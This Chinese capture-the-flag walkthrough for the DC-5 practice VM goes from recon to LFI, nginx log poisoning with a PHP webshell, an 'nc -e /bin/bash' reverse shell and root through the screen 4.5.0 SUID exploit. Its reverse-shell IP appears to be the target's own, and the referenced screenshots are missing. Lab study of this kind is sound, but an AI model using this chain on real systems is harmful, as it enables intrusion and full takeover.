ARTICLE DETAIL

资讯详情

深耕郑州网站建设与运营推广的一线实战洞察。

【DC靶机渗透系列】DC-5靶机详细教程,从一份隐藏文件开始的渗透之路

【DC靶机渗透系列】DC-5靶机详细教程,从一份隐藏文件开始的渗透之路 目标拿到DC-5靶机的 root 权限工具kali,Antsword,Brup suite抓包浏览器插件wappalyzer一信息收集1.1主机扫描收集到靶机的IP地址。# kali sudo arp-scan -l这样就可以知道目标IP地址是192.168.182.188 。1.2利用nmap进行详细信息收集。# kali nmap -sV 192.168.182.188我们就知道靶机打开了80端口和111端口并且发现了111端口是执行RPC 远程管理所以111端口可以暂定为远程控制服务端的高价值目标。1.3访问web服务收集信息。可以发现并没有暴露很多信息。那么作者就带你一一挖掘信息出来。1.3.1文件路径扫描。尝试找到关键的文件#kali dirsearch -u 192.168.182.188 -i 200这样就出来了文件路径但是好像并没有什么有价值的文件。1.3.2利用浏览器插件发掘服务器信息。这样的信息照样十分少并且只能知道编程为PHP和服务器是nginx。1.3.3利用浏览器面板查看源代码。可以观察发现提交表单的文件是 thankyou.php 文件。由于该文件是在服务器上兼顾前端和后端数据库所以会有两个种可能的漏洞XSS漏洞和LFI漏洞因为在这里XSS漏洞并不能帮我们去渗透进入服务器所以先测试文件 thankyou.php 是否具有LFI漏洞。可以看到是以GET方式进行传参还是比较方便的。如果想要确认是否具有LFI漏洞的话需要知道可以被执行的参数是什么而这个很明显需要枚举常见的参数可以利用工具进行暴力枚举好在作者比较有经验第一个参数尝试的是 file 成功了。其实靶机一般参数都是会设置成 file 如果是与文件相关的话。这就像是这个世界默认的一般还有些会设置为 filename 等等当枚举不行的时候就直接放弃好在这里我们找到了参数。直接在url中访问文件 /etc/passwd 可以确认服务器是 Linux。并且确实存在漏洞 LFI二漏洞利用2.1利用nginx日志污染进行植入木马。经典攻击我们先确认可以访问到nginx的日志。nginx日志分为两个日志 /var/log/nginx/error.log 和 /var/log/nginx/access.log 。看图片可以看到确实是可以访问内容。2.1.1利用Brup suite伪造污染点。这样就可以直接在nginx里面的日志。这样有一个好处就是不会被URL编码如果是一个按照AI提供的方法写的话那么就会空格特殊标签等等都会被URL编码然后放到日志文本中就不会被PHP引擎解析因为识别不到?php ?这样的特殊格式。思考为什么一句话木马使用 REQUEST 而不是 POST 2.1.2反弹shell。直接利用蚁剑来进行访问。这样就可以了。尝试利用端口111进行远程控制服务器然后在进行提权三权限提升3.1将AntSword与kali相互连接起来。这样就可以获得一个非常稳定的交互式shell终端这个是必要的一个步骤不能省略。不然有些命令再蚁剑虚拟终端执行会崩溃了。# kali nc -lvnp 4444# AntSwrod nc -e /bin/bash 192.168.182.188 4444# kali python -c import pty;pty.spawn(/bin/bash)3.2寻找 SUID 可执行文件思考SUID提权的条件与可执行原理# AntSword find / -perm -4000 -type f 2/dev/null可以发现特殊的文件 /bin/screen-4.5.0 着份文件在kali上面有对应的荷载。在kali上面找到我们所需要的荷载。#kali searchsploit screen 4.5.0那么就可以发现有着对应的荷载。利用命令将荷载文件放到靶机上去并且赋予执行权限。# kali searchsploit -m linux/local/41154.sh # 将文件导出到此文件下方 # 然后再利用蚁剑的文件上传就可以了 chmod x 41154.sh # 赋予文件执行权限 41154.sh # 获得 root 权限尝试利用该Linux系统的内核版本的漏洞进行提权这样就会得到了最后的 flag.txt
返回列表